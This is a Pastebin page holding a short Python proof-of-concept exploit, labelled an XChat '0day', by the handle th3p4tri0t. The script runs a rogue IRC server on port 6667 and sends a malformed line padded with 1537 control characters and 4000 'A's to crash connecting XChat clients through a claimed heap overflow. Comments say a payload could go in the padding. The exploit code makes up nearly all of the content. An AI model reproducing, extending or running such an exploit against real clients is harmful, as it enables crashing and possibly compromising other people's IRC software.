API tools faq
paste
_St0rm

Xchat 0day (th3p4tri0t)

_St0rm
Feb 14th, 2012
608
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.08 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # This only works on XChat on KDE, I'm not sure about windows.
  3. # It has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5
  4. # It is a heap overflow and is some sort of error with X Windows
  5. # It uses 1537 (this is the minimum) of the ascii value 20
  6. # after this, an unknown number of any other character (did not check for special
  7. # characters) is required to trigger a crash, presumably the payload will go here.
  8. # th3p4tri0t
  9.  
  10. import socket
  11.  
  12. print "XChat PoC Exploit by th3p4tri0t\n"
  13.  
  14. print "Creating server..."
  15. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  16.  
  17. print "    [*] Binding to socket..."
  18. sock.bind(('127.0.0.1', 6667))
  19.  
  20. print "    [*] Listening on socket..."
  21. sock.listen(5)
  22.  
  23. print "    [*] Accepting connection..."
  24. (target, address) = sock.accept()
  25.  
  26. print "    [*] Sending payload..."
  27. buffer = "hybrid7.debian.local "
  28. buffer += chr(20) * 1537 # minimum required of this character
  29. buffer += "A"*4000               # anything can go here and it still works.
  30. buffer += " :*\r\n"
  31.  
  32. target.send(buffer)
  33.  
  34. target.close
  35. sock.close
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!